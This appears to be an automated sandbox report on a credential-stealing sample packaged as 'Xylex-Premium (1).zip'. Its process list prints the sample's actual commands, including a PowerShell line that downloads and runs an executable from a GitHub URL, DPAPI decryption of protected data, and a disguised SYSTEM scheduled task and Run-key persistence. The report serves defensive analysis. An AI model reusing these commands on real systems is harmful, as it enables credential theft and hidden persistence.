Malware Analysis Report

2024-11-30 07:44

Sample ID 240603-g6em7sef2y
Target Xylex-Premium (1).zip
SHA256 bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f
Tags execution persistence spyware stealer
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f

Threat Level: Known bad

The file Xylex-Premium (1).zip was found to be: Known bad.

Malicious Activity Summary

execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Looks up external IP address via web service

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates physical storage devices

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates processes with tasklist

Detects videocard installed

Uses Task Scheduler COM API

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-06-03 06:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-06-03 06:24
Reported 2024-06-03 06:27
Platform win11-20240419-en
Max time kernel 89s
Max time network 94s

Command Line

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Xylex-Premium (1).zip"

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Xylex-Premium (1).zip"

Network

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted 2024-06-03 06:24
Reported 2024-06-03 06:26
Platform win11-20240508-en
Max time kernel 48s
Max time network 67s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cXJSBWljVeMYxpz.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe" C:\Windows\system32\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1584 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 896 wrote to memory of 4916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
PID 896 wrote to memory of 4916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
PID 4916 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1008 wrote to memory of 748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1008 wrote to memory of 748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 748 wrote to memory of 1192 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 748 wrote to memory of 1192 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4916 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2312 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2312 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4916 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 3752 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3752 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4916 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4644 wrote to memory of 2164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4644 wrote to memory of 2164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2372 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4916 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 3776 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3776 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4916 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2052 wrote to memory of 996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2052 wrote to memory of 996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4916 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 4684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2040 wrote to memory of 4684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2828 wrote to memory of 940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2828 wrote to memory of 940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3536 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4916 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 1916 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1916 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4916 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2020 wrote to memory of 3444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 2020 wrote to memory of 3444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 4916 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 3180 wrote to memory of 3788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3180 wrote to memory of 3788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit

C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CDE.tmp" "c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\CSCF175916096AE4A709A7D4E890657D51.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,84,247,95,191,127,65,164,7,108,14,99,167,79,145,68,0,23,63,137,200,229,48,25,187,125,154,136,244,216,122,194,233,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,174,133,137,58,194,152,7,254,63,115,138,192,110,39,205,26,84,32,203,77,169,223,134,144,91,87,94,120,158,183,198,139,48,0,0,0,51,240,13,34,140,172,98,245,132,204,94,122,239,21,90,91,7,173,16,206,243,159,155,246,206,122,172,130,69,238,124,72,110,14,65,215,50,99,215,38,127,198,71,209,254,163,67,51,64,0,0,0,226,164,140,243,68,213,186,44,50,107,36,163,86,98,166,208,144,217,29,216,38,197,247,81,229,70,80,89,44,9,59,199,208,128,66,45,196,130,11,45,55,179,64,172,67,212,88,236,137,183,214,204,179,188,80,58,219,144,206,168,13,80,69,252), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,84,247,95,191,127,65,164,7,108,14,99,167,79,145,68,0,23,63,137,200,229,48,25,187,125,154,136,244,216,122,194,233,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,174,133,137,58,194,152,7,254,63,115,138,192,110,39,205,26,84,32,203,77,169,223,134,144,91,87,94,120,158,183,198,139,48,0,0,0,51,240,13,34,140,172,98,245,132,204,94,122,239,21,90,91,7,173,16,206,243,159,155,246,206,122,172,130,69,238,124,72,110,14,65,215,50,99,215,38,127,198,71,209,254,163,67,51,64,0,0,0,226,164,140,243,68,213,186,44,50,107,36,163,86,98,166,208,144,217,29,216,38,197,247,81,229,70,80,89,44,9,59,199,208,128,66,45,196,130,11,45,55,179,64,172,67,212,88,236,137,183,214,204,179,188,80,58,219,144,206,168,13,80,69,252), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,229,245,191,182,116,196,172,135,92,62,208,230,226,209,31,192,16,77,45,177,133,120,6,42,199,39,137,78,15,100,247,138,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,251,41,111,16,231,188,165,60,91,228,157,179,238,156,70,106,241,213,122,44,127,169,183,152,64,186,117,78,212,59,236,110,48,0,0,0,151,38,209,60,169,118,114,250,113,124,112,151,191,43,179,192,208,227,124,17,191,222,27,175,80,52,49,13,80,8,8,222,17,54,104,68,124,92,221,143,249,139,245,124,129,40,175,81,64,0,0,0,197,221,147,19,175,181,29,12,187,158,206,80,101,122,174,32,210,69,234,24,93,61,165,44,50,34,119,140,206,52,102,181,227,5,84,163,173,252,204,86,206,148,14,197,48,91,49,84,240,125,90,8,127,182,78,40,212,33,56,128,92,217,115,226), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,229,245,191,182,116,196,172,135,92,62,208,230,226,209,31,192,16,77,45,177,133,120,6,42,199,39,137,78,15,100,247,138,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,251,41,111,16,231,188,165,60,91,228,157,179,238,156,70,106,241,213,122,44,127,169,183,152,64,186,117,78,212,59,236,110,48,0,0,0,151,38,209,60,169,118,114,250,113,124,112,151,191,43,179,192,208,227,124,17,191,222,27,175,80,52,49,13,80,8,8,222,17,54,104,68,124,92,221,143,249,139,245,124,129,40,175,81,64,0,0,0,197,221,147,19,175,181,29,12,187,158,206,80,101,122,174,32,210,69,234,24,93,61,165,44,50,34,119,140,206,52,102,181,227,5,84,163,173,252,204,86,206,148,14,197,48,91,49,84,240,125,90,8,127,182,78,40,212,33,56,128,92,217,115,226), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

